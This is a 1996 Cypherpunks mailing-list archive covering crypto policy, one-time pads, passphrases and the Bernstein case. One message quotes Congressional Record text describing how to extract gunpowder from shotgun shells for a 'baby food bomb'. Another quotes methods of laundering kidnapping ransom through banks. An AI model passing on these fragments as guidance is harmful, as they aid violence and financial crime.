variety of fields.  Not possible without alot of cops and alot of guns.  The
results would not be pretty.

The thing I have not determined is whether they understand the outcome of
the ideas they are wanting to implement.  A good case could be made either
way for cluelessness or totalitarian mindsets.  I am beginning to think it
is a bit of both...

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 20 Apr 1996 06:57:56 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <2.2.32.19960419185647.006e3944@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 4/19/96 -0700, Alan wrote:
>The thing I have not determined is whether they understand the outcome of
>the ideas they are wanting to implement.  A good case could be made either
>way for cluelessness or totalitarian mindsets.  I am beginning to think it
>is a bit of both...

More likely, IMHO, it's an attempt by politicians to make the public think
they're actually doing something.  It's a lot easier to rant about
terrorists and the Net than to address the root causes of terrorist violence
(whatever they may be...).


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 20 Apr 1996 07:11:15 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <2.2.32.19960419191046.00a8f984@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 4/19/96 -0700, Rich Burroughs wrote:
>At 10:46 AM 4/19/96 -0700, Alan wrote:
>>The thing I have not determined is whether they understand the outcome of
>>the ideas they are wanting to implement.  A good case could be made either
>>way for cluelessness or totalitarian mindsets.  I am beginning to think it
>>is a bit of both...
>
>More likely, IMHO, it's an attempt by politicians to make the public think
>they're actually doing something.  It's a lot easier to rant about
>terrorists and the Net than to address the root causes of terrorist violence
>(whatever they may be...).

I the long run, I think that they are making the problem worse.

My theory as to the causes of disorder and "terrorism" have to do with a
general distrust and disrespect for laws and governments.  I see this as
being caused by having laws and governments that are hard to respect.

Even without conspiracy theories, what we know that the government of the US
has done to its own citizens is pretty scary.  Between the releasing of
radiation on humans near Hanford "just to see what would happen", the
misdeads of the FBI with Hoover and his cronies, support of various
dictators, and on and on and on, the people are getting more and more
distrustful of what they are told.  Mix that with a War on Unauthorized
Molecules that gets more extereme and more bizzare every day, law
enforcement that seems to be more concerned with issues unconnected with any
principles relating to justice, and lawmakers who are totally disconnected
from the things that are making laws about.

These things tend to generate an attitude of "Every being for themselves!".
Why not try to grab a bit under the table when your leaders are doing
likewise on a bigger scale?  Or try to overthrow a system that looks more
and more oppresive?

The forces of "Law and Order" and the forces of "Chaos and Dissent" seem (to
me) to be feeding off the actions of each other.  Where it will end is
anyones guess.  I can imagine that it probibly not be very fun for the rest
of us.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sat, 20 Apr 1996 07:12:23 +0800
To: pmonta@qualcomm.com (Peter Monta)
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604190607.XAA17848@mage.qualcomm.com>
Message-ID: <9604191918.AA17670@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Peter Monta wrote:
 
> Perry Metzger writes:
> 
> > > 1.  If "cooking" a byte sequence in a manner that reduces its
> > > maximum entropy by less than 1% allows an attacker to break your
> > > cryptosystem, then it is crap to begin with.  With only a little
> > > more effort, he could break it anyway.
> >
> > I would suggest that you look at differential and linear cryptanalysis
> > to learn what a tiny little statistical toehold will give you.
> >
> > My "ad hominem PSA" stands. I suggest people not trust Mr. Wienke's
> > pronouncements. He appears to be suffering from significant hubris.
> 
> No, he's correct; cryptanalytic schemes like those you mention rely
> on statistical toeholds *in the context of a deterministic cipher
> algorithm*.  For one-time pads that are "cooked" or "screened" (and
> I agree that it's a silly thing to do), the toehold is much weaker,
> infinitesimal in fact.

Perry's right: giving up any statistical information is too much.
 
A slightly contrived example of why tossing out duplicated bytes is bad:
 
Suppose that a military organization is using this almost one-time-pad
system, and my spies tell my they've fallen into the habit of sending
"attack" and "defend" as their only 6-byte messages.  This isn't a problem
with a real one-time pad (except for traffic analysis...), but this lets
me determine the message 3.8% of the time!
 
For example, if I see:
 
0xfce8e8c7f4f7 (cyphertext I see)
 
which was generated by:
 
  d e f e n d  (message)
0x646566656e64 (message in hex)
0x988d8ea29a93 (pad)
 
Then I know that I'm not going to be attacked.  Attack couldn't have had
the e8e8, because they threw out those pads.
 
> For example, suppose we take 1024-bit blocks from a physical RNG
> (which we'll agree is "good", has entropy close to 1024 bits,
> whatever that means).  There are 2^1024 such blocks.  Obtain one
> and apply the magical test---if the block fails, toss it in the
> bit bucket. Suppose, conservatively, that half the sequences fail.
> The cryptanalyst now knows that the plaintext cannot be
> ( failed_pad xor ciphertext ) for any of the 2^1023 failed_pads.
> Thus, it must be one of the other 2^1023.  This is the *only*
> toehold he gets.

That's plenty big to be a problem.
 
Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 20 Apr 1996 07:35:38 +0800
To: cypherpunks@toad.com
Subject: Re: DANGER! Baby-Food Bombs on the Internet! [was Re: (Fwd)]
Message-ID: <2.2.32.19960419193027.006db95c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 4/19/96 -6, Peter wrote:
[snip]

>With the Internet in place, government attempts to legislate the flow of
ideas and 
>knowledge are about as effective as attempts to legislate the migration
routes of birds. 

This is true, at least until governments make their outright attempts to
control the flow of the Net itself.  Don't get me wrong -- I'm not saying
that such attempts will be successful or effective, but I have no doubt that
they will be attempted.


Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Sat, 20 Apr 1996 04:48:14 +0800
To: cypherpunks@toad.com
Subject: Re: Spaces in passwords
Message-ID: <9604191931.AA4559@>
MIME-Version: 1.0
Content-Type: text/plain


>>Of course not. In a normal Unix password, adding spaces to the
>>password search space increases the search space, so it necessarily
>>makes the search harder.
>
>Depends on the space of ideas that are leading to your passwords.
>If the reason you're adding spaces is to separate an n-character word
>from the dictionary from a 7-n character word from the dictionary,
>this reduces the search space for a cracker considerably.
>At least pick random punctuation instead.

Huh?  I don't follow your reasoning.

If you use two random words, the search space for a dictionary attack
with an N word dictionary is N^2.  That's true whether you include a space
or leave it out.  If you use "random punctuation" and the punctuation
character is unknown, you add perhaps a factor 20, which is so much smaller
than N that it isn't worth arguing about.

Two-word passphrases are pretty good, and if you feel uncomfortable
with an N^2 work factor, use three words to get N^3.  That's a much bigger
win than talking about random punctuation characters.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 20 Apr 1996 05:59:25 +0800
To: perry@piermont.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604191221.IAA11773@jekyll.piermont.com>
Message-ID: <9604191736.AA00569@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
>  Furthermore, I suggest you look up the Venona intercept work
>  and tell me again about how far an advesary will go with a
>  tiny toehold.

The Venona breaks came because the NSA had a lot of encrypted traffic and  
some pads were used more than once, which is hardly a tiny toehold.  After  
years of dragging intercepted messages through each other, something finally  
popped out.  Messages encrypted with pads that were only used once are still  
unbroken, AFAIK, even though the pads were simply generated by clerks banging  
on keyboards.

Still, a tiny toehold is all a good analyist needs to break a non-OTP  
cryptosystem, which attempts to protect a lot of information with only a  
little bit entropy.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Sat, 20 Apr 1996 05:31:15 +0800
To: cypherpunks@toad.com
Subject: Nym Server Questions and Remailer Suggestion
Message-ID: <9604191659.AA01571@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


1. Do the nym servers lie about the times of being sent?
2. Do they automatically latantize messages? I get an very quick response
from a nym server, and a very quick response from the remailer, but a
message to the nym identity (which goes through both) takes a long time

*. For the purpose of mitigating traffic analysis, has anyone considered
creating a "delete-me" redirect, hence I could send a few messages to a nym
server that I know won't go anywhere, but I can hide my traffic in that
stream. Also, nym servers could ping each other and send delete-me redirects
admist all the jumble of the normal redirects. An easy solution is to send
incorrectly encrypted messages which are thrown away regardless.
_______________________
Regards,            I am a creationist; I refuse to believe that I could have
                    evolved from humans.
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Apr 1996 05:37:10 +0800
To: John Robert LoVerso <john@loverso.southborough.ma.us>
Subject: Re: Unsubsrive
In-Reply-To: <199604190010.UAA03256@loverso.southborough.ma.us>
Message-ID: <Pine.BSF.3.91.960419131610.2238B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 18 Apr 1996, John Robert LoVerso wrote:

> > On Thu, 18 Apr 1996, John Robert LoVerso wrote:
> > Unsubsrive me!
> 
> Ha ha.  Very funny forgery.  The fool who forged the "unsubsrive" in my
> name wasn't even clever.  He left his calling card all over the message:
> 
>     Received: by sturgeon.coelacanth.com (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0)
> 	for cypherpunks@toad.com; id AA0833; Thu, 18 Apr 96 14:23:07 -0400
> 
> Please undo your [collective] dirty work.
> 
> John
> 

Hmmmm, this could be interesting ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Apr 1996 05:28:15 +0800
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: FW: EARN $350 PER DAY!!!
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-960419011341Z-18898@tide21.microsoft.com>
Message-ID: <Pine.BSF.3.91.960419132041.2238C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Blanc Weber wrote:

> I received the message below today, addressed to me.  Notice the info at
> the bottom.  I didn't follow the instructions.  But this could be what
> some people are receving which prompts them to send "unsuvscrive
> messages".
>    ..
> Blanc 
> 
> >----------
> >From: 	communicate@earthlink.net[SMTP:communicate@earthlink.net]
> >Sent: 	Thursday, March 28, 1996 1:09 PM
> >Subject: 	EARN $350 PER DAY!!!
> >
> >             If you would like to earn up to $350 per day... call
> >1-800-545-0341!!

I love it when junk mail comes with "800" numbers or pre-paid return 
envelopes ...   ;)

Will they ever learn ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 20 Apr 1996 13:26:10 +0800
To: <cypherpunks@toad.com>
Subject: [NOISE] sign-off instructions
Message-ID: <v03006603ad9da8922289@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[author unknown, fwds elided]

Uni, take note... Might make an amusing periodic auto-post to the clueless
list. ;)

   dave

................................. cut here .................................

"HOW TO UNSUBSCRIBE"

This is what you need to do.  Please read these instructions carefully
before beginning.

tools needed:
  one Hammer
  one scredriver
  one pair of pliers
  one heavy-duty pair of wire cutters
  one bucket of saline water
  a box of sani-wipes

Step #1: Stop payment on any checks that you may have sent to your Internet
Service Provider (GOD).

Step #2: If GOD is unresponsive and you are still receiving mail from this
list, you will need to find the "mailhost". This is a machine usually
located in a locked office. Every day around noon, the mailman will deliver
a box of diskettes with that day's mail messages, including yours from this
list, to this machine. Typically, only a handful of people have keys to the
"mailhost". The reason why this machine is locked up is because this is
typically the best, fastest, most powerful computer at your facility and
the people with keys don't want to share it. If you must, break or pry the
door down with one (1) hammer (you did get all the tools needed?).

Step #3: Find the ON/OFF switch for this machine. Using the pliers, set the
switch to the OFF position by tugging downwards until the disposable
plastic switch breaks away from the computer casing. Discard the disposable
plastic switch in an environmental-friendly manner. This will alert the
mailman to not deliver the diskettes with the messages to the "mailhost"
not unlike the little red flag found on mailboxes. This should resolve your
mail problem immediately.

Step #4: You may experience a recurrence of mail within 72 hours. If this
should happen, you will need to disable the "mailhost" once again with more
forceful measures. Repeat Step #2. Don't be suprised if there is a sturdier
door in place than the one you destroyed previously. This is due to the
fact that the "Have Key" clique found out that someone has seen their
private stash of computer equipment.

Step #5: After you have once again regained entry into the "mailhost" room,
open up the back of the "mailhost". There may be a large tv-like device on
top of the "mailhost" You will need to remove this first. Take your wire
cutters, and cut any cables binding the tv-like device to the "mailhost".
Set the tv-like device to the side. With your screwdriver, remove each and
every screw that you can find on the "mailhost". Once this is done, the
"mailhost" should break away into two or more pieces.

Step #5: Find a large box with a fan attached to it. It will be clearly
marked with the following labels: "Danger" "High Voltage" "Do not open - no
user-servicable parts". Don't worry, these labels are merely in place to
satisfy OSHA requirements and you are not in any danger at all. Take the
bucket of saline water and pour it into any vents or ports that the large
box may have. Any extra water should be poured directly into the computer
chassis, be sure to properly soak each and every component.

Step #6: In the event of fire (OSHA has been known to be right on
occassion), douse any flames with the sani-wipes.

This solution is provided without warranty. It is not bio-degradable or
fat-free. In the event of sudden death, contact a physician immediately.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MBSFT-0K <MBSFT-0K@carraig.ucd.ie>
Date: Sat, 20 Apr 1996 02:50:14 +0800
To: cypherpunks@toad.com
Subject: Re: Unsubsrive
Message-ID: <587A16036@carraig.ucd.ie>
MIME-Version: 1.0
Content-Type: text/plain




> Unsubsrive me!
> 
> 
Lorca Kelly
MBSFT-0K@carraig.ucd.ie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Apr 1996 08:53:23 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <9604191736.AA00569@ch1d157nwk>
Message-ID: <199604191756.NAA12031@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Loewenstern writes:
> Perry writes:
> >  Furthermore, I suggest you look up the Venona intercept work
> >  and tell me again about how far an advesary will go with a
> >  tiny toehold.
> 
> The Venona breaks came because the NSA had a lot of encrypted traffic and  
> some pads were used more than once, which is hardly a tiny toehold.

In general, they were used twice. Thats a pretty tiny toehold.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Apr 1996 06:45:23 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: DANGER! Baby-Food Bombs on the Internet! [was Re: (Fwd)]
In-Reply-To: <Pine.ULT.3.92.960418213819.12497L-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.960419133540.2238F-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


You have to be pretty damn stupid if you need to go out and surf the 'net 
to find out that gunpowder can be found in shotgun shells.

Big news flash: you can find fertilzer at the hardware store, rust on  your
daddy's Chevy, and bird doodoo in the back yard.  Anybody who wants 
to figure out how to make explosives and CAN'T is too stupid to have 
graduated from high school (and probably too stupid to navigate the 
'net). They're much more likely to go down to the local surplus store, 
and learn all this out of old U.S. military training manuals than to find 
it on the 'net.

Who voted for these morons? They are only doing this because anything 
involving the 'net will get their NAMES IN THE NEWS. 

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

On Thu, 18 Apr 1996, Rich Graves wrote:

> On Thu, 18 Apr 1996, the intrepid anonymous-remailer@shell.portal.com
> FUDded to cypherpunks:
> 
> > [Congressional Record: April 17, 1996 (Senate)]
> > [Page S3454-S3478]
> 
> [fascinating but probably out-of-context remarks from Biden, suggesting
> that we should all don our tin-foil hats in fear of the FBI rabdar vans,
> deleted]
> 
> I cannot find the referenced remarks.  Assuming the selection is accurate,
> it is abundantly clear that Binden continued speaking beyond where you so
> ominously chose to cut him off. Could you give me a *specific* URL? Or a
> way to get static page number URLs? I can only figure out how to search
> http://thomas.loc.gov/ and get temp URLs.
> 
> I *did* read Biden's *highly entertaining* comments on the contentious
> Internet Baby Food Bomb Issue, from the conference report mentioned by the
> redoubtable Mr. Anonymous. Thanks so much for pointing me to this debate;
> it almost makes still being in my office worthwile.
> 
> Does anyone know the documents that Senator Biden is quoting? I *must
> know* how to build The Dreaded Baby-Food Bomb.
> 
>   **I AM NOT MAKING THIS UP. THIS IS YOUR UNITED STATES SENATE AT WORK.**
> 
> >From the April 17th Congressional Record, what page I unfortunately cant
> tell you, because Thomas and/or I suck:
> 
> 
> Mr. BIDEN. Mr. President, I yield myself such time as I may use within the
> limit of the time I have.
> 
> This provision is very straightforward and simple. It is beyond me why it
> was taken out of the Senate version of the language that was sent to the
> House.
> 
> I have heard many colleagues stand up on the floor here and rail against
> pornography on the Internet, and for good reason.  Even when we thought we
> had corrected the language that Senator Exon introduced to comport with
> the first amendment, I still hear in my State, and I hear of people
> writing about how so and so is promoting pornography on the Internet
> because they will not ban pornography on the Internet.
> 
> Yet, in the bill, we came along--all of us here--and the genesis of this
> came from Senator Feinstein, when it was initially offered. The majority
> leader, Senator Hatch, and I had some concerns with this, and we thought
> the language to ban teaching people how to make bombs on the Internet or
> engage in terrorist activities on the Internet might violate the first
> amendment. Senators Dole, Hatch, and I worked to tighten the language and
> came up with language that was tough and true to civil liberties. It was
> accepted by unanimous consent.
> 
> We have all heard about the bone-chilling information making its way over
> the Internet, about explicit instructions about how to detonate pipe bombs
> and even, if you can believe it, baby food bombs. Senator Feinstein quoted
> an Internet posting that detailed how to build and explode one of these
> things, which concludes that `If the explosion don't get'em, the glass
> will. If the glass don't get'em, the nails will.'
> 
> I would like to give you a couple of illustrations of the kinds of things
> that come across the Internet. This is one I have in my hand which was
> downloaded. It said, `Baby food bombs by War Master.' And this is actually
> downloaded off the Internet. It says:
> 
> These simple, powerful bombs are not very well known, even though all of
> the materials can be obtained by anyone (including minors). These things
> are so--
> 
> I will delete a word because it is an obscenity.
> 
> powerful that they can destroy a CAR. The explosion can actually twist and
> mangle the frame. They are extremely deadly and can very easily kill you
> and blow the side of a house out if you mess up while building it. Here is
> how they work.
> 
> This is on the Internet now. It says:
> 
> Go to Sports Authority or Herman's Sport Shop and buy shotgun shells. It
> is by the hunting section. At the Sports Authority that I go to you can
> actually buy shotgun shells without a parent or an adult. They don't keep
> it behind the glass counter, or anything like that. It is $2.96 for 25
> shells.
> 
I don't know where this might be - it is illegal in most states to sell 
ammunition to minors. I'm guessing that it is illegal in all states, 
(though Texas has some interesting views).
I used to have to send my mother to the store for .38 wadcutters ... 

> And then it says:
> 
> Now for the hard part. You must cut open the plastic housing of the bullet
> to get to the sweet nectar that is the gun powder. The place where you can
> cut is CRUCIAL. It means a difference between it blowing up in your face
> or not.
> 
> Then there is a diagram, which is shown as to how to do that on the
> Internet. Then it says:
> 
> You must not make the cut directly where the gun powder is, or it will
> explode. You cut it where the pellets are.
> 
Yeah, I think every kid I grew up with did this by the time they were 10 
years old. Back when there were about 10 computers on the internet, and 
none of us had ever seen one. When we were younger, we used to spend 
hours extracting gunpowder from the paper strips used in toy cap pistols 
and cutting the heads off matches.

I wouldn't want my kids playing with things like this, but your kid is
an idiot if they need to surf the 'net to figure out that gunpowder can be
found in ammunition. 

> And then it goes through this in detail. And then it gets to the end, and
> it says:
> 
> Did I mention that this is also highly illegal? Unimportant stuff that is
> cool to know.
> 
> And then it rates shotgun shells by two numbers, gauge, pellet size, and
> goes into great detail. It is like building an erector set. It does it in
> detail.
> 
> -rich
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 20 Apr 1996 08:44:53 +0800
To: Alan Olsen <cypherpunks@toad.com>
Subject: Re: TERRORISM PREVENTION ACT--CONFERENCE REPORT	 was: EFF/Bernstein PressRelease
Message-ID: <199604192057.NAA03900@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 4/19/96 -0700, Alan Olsen wrote:
>On to another [rant]...
>
>I have been seening a surprising amount of rant from the forces of
>Government about keeping information out of "the hands of terrorists".  ...
[Much good rant deleted]

Real terrorists receive instruction at terrorism schools run by
organizations like the Iranians, the PLO, and even the US government (CIA,
Special Forces etc.)  The rate of technology transfer is much greater with
hands-on teaching than it is with literature in e.g. libraries or the net.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Apr 1996 06:43:06 +0800
To: trei@process.com
Subject: Re: (Fwd) Re: GPS-based authentication (response)
In-Reply-To: <199604191446.HAA11803@cygnus.com>
Message-ID: <199604191817.OAA12107@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Denning wrote back quickly to say that she was going out of town,
> and that her colleague would respond.
> 
> MacDoran took 6 days to reply, and then only to say that if my 
> employer entered into a non-disclosure agreement with ISR Inc,
> then all my concerns "would be addressed".
> 
> I wrote back to MacDoran, suggesting that open disclosure of their
> techniques would build confidence in their product, and requesting
> permission to repost his letter to the cpunk list. He has not responded
> after 24 hours.

Perhaps they are worried about public disclosure adversely impacting
their impending merger with the guys who make Power OTP.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 20 Apr 1996 13:26:33 +0800
To: cypherpunks@toad.com
Subject: [EVENT] cheap date w/Bob Dole
Message-ID: <v03006604ad9daa598d82@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3940.1071713569.multipart/signed"

--Boundary..3940.1071713569.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Calling All Cypherpunks:

An interesting "special event" just showed up on the radar. Sorry for the
noise if you've heard about it already.

   dave

................................ cut here .................................

"Public Policy Issues Forum on Information Security"

(aka "Celebration of 20 years of Public Key Cryptography" 1976-1996)

Co-Hosts:
 Cylink Corporation
 The Churchill Club

Date & Place:
 Monday, April 29 (6-10 PM)
 Marriott Hotel, Burlingame (spittin' distance from SF Airport)

Dinner:
 $20 for club members
 $35 for non-members
 Menu includes [mad cow] steak dinner and wine
 Cash bar

Speakers include:

 - James Freeman
FBI Special Agent in Charge of the San Francisco Region; on the $100
billion annual loss to U.S. business from industrial espionage.

 - David Morris
Vice President of Cylink; on advanced security systems needed today beyond
firewalls which are only partial solutions; five requirements a truly
secure information protection system must have.

 - Senator(s) Larry Pressler (and Bob Dole?*)
on new legislation (The Encryption Communications Privacy Act of 1996) to
loosen restrictions on strong crypto in the U.S.; need to allow U.S. firms
to export long-key-length crypto.

[yes, Virginia, _that_ Senator Pressler, the one who made the Bottom Ten list]

 - Senator Conrad Burns (R/Montana)
on his proposed bill (Promotion of Commerce On-Line in the Digital Era)
which could include preventing government from becoming an escrow registry
bureau.
[of CFP96 cowboy-hat voicelink fame]

 - Congressman Robert Goodlatte
on his "Security and Freedom Through Encryption Act" (SAFE) legislation.

 - Paul Raines
Project Manager with the U.S. Postal Service; previewing the USPS
Electronic Postmarking System (1st nationwide use of PKC in a
consumer-based public service, includes a certificate authority registry).

 - Whitfield Diffie
 - Martin Hellman
 - Ralph Merkle
the three inventors/original patent-holders in the field of Public Key
Cryptography on a panel discussing the future of cryptography, 3DES and
"other issues."

__________
If you're planning on being hungry on 29 April, get more info or RSVP and
reserve a seat by calling:

The Churchill Club
2323 South Bascom Ave
Campbell CA 95008

408.371.4460 voice - ask for Lisa (try pressing #0 at the menu)
408-371-4180 fax

There's a suggestion that you _could_ pay by sending your credit card info
over the net (ironically, I see no public key being provided, but that's
AOL for you...). For the foolhardy, the address is: <chrchllclb@aol.com>
Alternatively, you can send it to <kmitnick@ax.netcom.com> or
<donations@lsd.com>  ;)

__________
Notes:
* Sen. Dole hasn't confirmed yet, but he's co-sponsor of the Encryption
Communications Privacy Act, so if there are no high-visibility Senate votes
or major campaign babies to kiss on-camera, chances are he'll paint a
target on his back and kick it with us.

The speakers alledgely include representatives from all three Congressional
legislation groups. Expect the Press to attend.

Other confirmations are still coming in from additional participants.

For the price of a Van Halen ticket, this should be worth a giggle or two.




--Boundary..3940.1071713569.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zCkNv
bW1lbnQ6IFZlcmJ1bSBzYXBpZW50aSBzYXRpcyBlc3QuCgppUUNWQXdVQU1Y
aEQ1S0hCT0Y5S3J3RGxBUUdpMkFQL1RYTXBqenY2TzBDSWZoN1RNOHZPR0dx
Um5qRVJudks1CkhjNWI4TytxNTZybEFpcHJWWnRwWEVRQ1RubnpoRVZ4KzF1
TVA2eTVyTHlnQXNyVmphaVkybzBBWjBwZko5WmwKTW5uSmpqaTZJaURnbWpx
THVuN2pCQm9ZNUhvMERUT0ZDRFJHdFdra3JWTnBQYS9aeHQrZk9YbzZGMWFP
WWU5QQpOdmhFalNqRCt2TT0KPW0xOSsKLS0tLS1FTkQgUEdQIE1FU1NBR0Ut
LS0tLQo=
--Boundary..3940.1071713569.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 20 Apr 1996 09:34:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604192157.OAA07383@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:

>>
>
> Clever kidnappers make arrangement in advance to deposit this cash with 
> willing financial institutions who will hold it for several years before 
> mixing it into their cash withdrawl stream.  Kidnappers are paid based 
> on a subtraction of interest for the period while the cash is undeposited 
> and earns no interest for the financial institution, plus a fee.
> 
> BCCI was quite notorious for using this method to cool off hot money.
> 
> When the money was only mildly hot, it was simply physically transported 
> to offshore banks in smaller lots and used for their cash payouts.  
> (While riskier, this allowed the payment of interest).
> 
> The other option was simply to launder the money through enough 
> agitations so that two or three banking secrecy entities were between the 
> return of the currency to free circulation and the kidnappers.
>

christ.

who the hell is this guy?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 20 Apr 1996 09:31:22 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Great line from Bernstein case
Message-ID: <v02120d03ad9dc19e2126@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


This one had me laughing hard:

>Defendants [The feds. Ed.]also
>conclude summarily that both the definition of cryptographic software
>and the exemptions from this definition are clear to a person of
>ordinary intelligence. This seems to be a bit of dissimulation, unless
>it is a confession, since the ODTC itself mistakenly classified
>Bernstein's academic paper as a defense article under Category XIII.



Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Sat, 20 Apr 1996 10:15:38 +0800
To: tcmay@got.net
Subject: 5th protect password?
Message-ID: <rschlafly1102233230>
MIME-Version: 1.0
Content-Type: text/plain



>> From: Hal <hfinney@shell.portal.com>
>> I have been quite appalled to read the various analyses on the net (URLs
>> not handy, but they have been posted here before I think) which conclude
>> that compelled disclosure of a cryptographic pass phrase would probably
>> be OK despite the Fifth Amendment.  This seems to be an area where there
>> is widespread agreement based on recent precedent.

>> from: --Tim May
>> What about the Fifth Amendment? Scholars are addressing this issue of
>> compelled disclosure of cryptographic keys. Note, of course, that diaries,
>> business records, papers, and, indeed, the entire contents of a putative
>> crime scene are accessible to crime investigators and the legal system.
>> (Whether giving up a key constitutes "testifying against one's self" or not
